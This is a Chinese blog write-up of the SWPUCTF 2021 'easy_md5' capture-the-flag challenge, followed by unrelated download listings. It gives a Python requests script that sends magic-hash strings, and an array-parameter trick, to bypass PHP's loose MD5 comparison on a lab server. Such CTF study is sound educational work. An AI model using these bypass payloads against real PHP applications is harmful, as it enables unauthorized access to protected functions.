[SWPUCTF 2021 新生赛]easy_md5

于 2024-08-08 10:50:17 发布
阅读量96 收藏
点赞数 1
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_81462177/article/details/141019011
版权

分析代码:1.包含flag2.php

2.GET传name,POST传password

$name != $password && md5($name) == md5($password) 属于MD5绕过中的php == 弱类型绕过

解题方法:

方法一

import requests

# 网站的URL
url = "http://node7.anna.nssctf.cn:28026"

# 用get方法传递的name参数
name = "aabg7XSs"
# 用post方法传递的password参数
password = "aabC9RqS"
# 两个参数的md5值均以0e开头且后面的字符均为纯数字
# 发送post和get请求,并获取响应对象
response = requests.post(url, data={"password": password}, params={"name": name})

# 打印响应的文本内容
print(response.text)

方法二

使用数组进行绕过,应为MD5不能加密数组,会报错,返回null,但是null=null返回的值为true
例如:a[]=1&b[]=2

我们使用HackBar

  • ?name[]=1
  • POST password[]=2

桑榆百川
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
MD5.zip_MD5Java_easy _elephantykb
09-21
标题中的"MD5.zip_MD5Java_easy_elephantykb"表明这是一个关于Java实现MD5加密的压缩包,易于使用,由用户"elephantykb"分享。这个压缩包可能包含了实现MD5加密功能的相关代码和文档。 描述中提到"JAVAMD5加密 很...
MSC.EASY5.zip_Easy5_msc easy5_vehicle vibration
09-19
【标题】"MSC.EASY5.zip" 是一个包含有关Easy5软件的压缩文件,主要针对“Easy5_msc easy5_vehicle vibration”主题,这显然与车辆振动分析和Easy5软件的应用有关。Easy5是一款强大的多体动力学仿真工具,特别用于...
2.rar_1T16_dwt_easy _noiseb5p
07-14
matlab cod fore DWT very Easy
Easy_draw.rar_easy _easy draw_easydraw
09-24
【标题】"Easy_draw.rar" 是一个压缩包文件,其中包含了一个名为 "easy draw" 或 "EasyDraw" 的简易图像处理软件。这个软件是专为编程初学者设计的,旨在帮助他们入门图形用户界面(GUI)开发和图像处理技术。 ...
2021莲城杯比题包.zip
10-12
这个比很可能是一个网络安全技术挑战,涉及了CTF(Capture The Flag)的形式,这是一种常见的网络安全模式,参者需要展示他们的信息安全技能,包括但不限于密码学、漏洞分析、逆向工程、网络侦查等。...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8374
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
财务费用支出表-可查询.xlsx
08-09
工资表,财务报表,对账表,付款申请,财务报告,费用支出表 适用人群:学习不同技术领域的小白或进阶学习者;可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。
ssm_160_mysql_强国有我党建网站_.zip
08-09
强国有我党建网站采用JAVA语言来进行开发,因为JAVA语言作为主流的web开发语言,其技术成熟,较为对各类开发者友好,社区也有十分多的文档,同时搭配SSM框架进行使用,可以做到更加高的开发效率帮助完成本次的开发和设计,在本次的开发选用的数据库为MySQL数据库,MySQL数据库可以很好的连接和搭配本次使用的JAVA语言,同时数据库也是一个开源免费完全不需要花钱的良心数据库,使用免费版本已经足已完成本次要实现的开发和设计的功能,最后本次的开发使用工具为eclipse,本工具在实际的开发使用中也是程序员进行java开发的不二选择,虽然目前后继者也有,但这个是完全开源免费的因为很适合本次开发工作,综上所述本次的开发与设计工作室用了目前语言排行榜第一的JAVA以及流行的web框架SSM,同时使用了MySQL数据库实现数据的储存,最后确定了eclipse作为我们的IDE环境。
PHP赞支付最新易支付系统源码 全新界面
08-09
安装说明: 访问 域名/install 进行安装 后台地址:/admin 账号admin 密码123456 后台可以对接码支付平台 这个源码余额需要监控,大家可以使用360网站监控来监控。 监控地址:域名/cron.php 域名/cron.php?do=settle
财务报表-自动管理收支表.xlsx
08-09
工资表,财务报表,对账表,付款申请,财务报告,费用支出表 适用人群:学习不同技术领域的小白或进阶学习者;可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。
ATM基础管理系统java窗口界面完整版.docx
08-09
ATM基础管理系统java窗口界面完整版
ssm_138_mysql_学生选课管理系统_.zip
08-09
现在的学校,无论是高等院校还是中学、小学,伴随着我国教育的不断普及,学校的学生人数也在不断的增长。在这种学生人数增长的带动下,现在学校所面临的教学管理压力较大。而学生在日常的学习活动中,选课是一项经常需要被使用的功能,因此学校在选课管理上需要高度的重视,特别是在每个学期的开学,学生都会进行新学期的选修课程选择,而传统的人工记录和管理的方式面对当下日益增长的学生人数而言,是无法很好的提供有效的管理的。而随着计算机和互联网的快速发展,现在通过以网络结构程序来实现在线选课是十分有必要进行开发和设计运行的,本次是通过利用了SSM框架来来实现一个学生选课系统的完整搭建,通过该系统的搭建来实现学生在线选课、教师在线课程管理、管理员进行全方位后台信息管理的主要功能实现。 本次所设计的系统能够有效的在各大高等院校进行使用,为学生、教师提供有效的在线服务。整体的设计上逻辑清晰,内容完整,具有很强的实用意义。
JAVA打飞机游戏设计与实现(论文+源代码).rar
08-09
在信息社会中,手机及其他无线设备越来越多的走进普通百姓的工作和生活,随着信息网络化的不断进展,手机及其他无线设备上网络势在必行。但是传统手机存在以下弊端: 1. 传统手机出厂时均由硬件厂商固化程序,程序不能增加、删除,有了错误也不能更新、修改,若要增加新功能必须另换一部手机。 2. 传统手机访问互联网是通过WAP(Wireless Application Protocal),所有网络资源必须接通网络才能在线访问,非常耗时、费用亦很高。 而Java技术在无线应用方面的优势非常明显: 1. 应用程序可按需下载,而不是购买由硬件商提供的套件,可升级空间大。 2. Java技术提供了一个类库,它使的应用开发商可以创建更为直觉、丰富的用户界面(GUI); 3. Java技术使网络带宽的应用更为有效,因为应用程序可以下载到器件上,并在本地运行,仅仅是在连接到服务器时才会占用网络带宽。 基于以上分析,Java手机将是未来手机的发展方向,是业界的热点。
基于MATLAB的汽车框定(完美运行).zip
08-09
汽车识别定位是指利用计算机视觉技术对道路上的汽车进行识别和定位的过程。通过分析汽车的外观特征(如车辆型号、颜色、特殊标志等)和运动轨迹,可以实现对汽车的自动识别和定位。 汽车识别定位在交通管理、智能交通系统和自动驾驶等领域具有重要应用价值。通过实时监测道路上的汽车信息,可以实现交通流量统计、交通拥堵预警、违规行驶监测等功能。在自动驾驶领域,汽车识别定位可以用来检测和跟踪其他车辆,实现车辆间的协同行驶。 汽车识别定位涉及到计算机视觉、图像处理、模式识别、机器学习等多个领域的技术。常用的方法包括特征提取、目标检测、目标跟踪等。目前,深度学习技术在汽车识别定位中表现出良好的效果,能够实现高准确率和实时性。
财务表.xlsx
08-09
工资表,财务报表,对账表,付款申请,财务报告,费用支出表 适用人群:学习不同技术领域的小白或进阶学习者;可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。
基于Springboot的宠物商城网站系统(有报告) Javaee项目,springboot项目
最新发布
08-09
资源详情:https://blog.csdn.net/2302_78191516/article/details/141072356
springboot8基于Web的社区医院管理服务系统.zip
08-09
首先介绍了设计的背景与研究目的,其次介绍系统相关技术,重点叙述了系统功能分析以及详细设计,最后总结了系统的开发心得。
最新运营版视频打赏平台源码/Thinkphp内核+支付宝/QQ钱包/微信二维码收款系统V3.6+安装文字教程
08-09
【第四版打赏源码】最新运营版视频打赏平台源码/Thinkphp内核+支付宝/QQ钱包/微信二维码收款系统V3.6 这两天有人说6月发出来的第三版有点问题,这个是最原始2018款,不过放心我测试并修复了一些问题,现在放给你们! 到处都是打赏视频,能用的不多,这个琉璃试过了,正常运行,如果不能运行,大家去锤死他…. 站长简单测试 编码是gbk的 自行调整,不会的别下载~~
【创新发文无忧】Matlab实现蛇群优化算法SO-DELM的故障诊断算法研究.rar
08-09
1.版本:matlab2014/2019a/2024a 2.附赠案例数据可直接运行matlab程序。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。 5.作者介绍:某大厂资深算法工程师,从事Matlab算法仿真工作10年;擅长智能优化算法、神经网络预测、信号处理、元胞自动机等多种领域的算法仿真实验,更多仿真源码、数据集定制私信+。 替换数据可以直接使用,注释清楚,适合新手
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值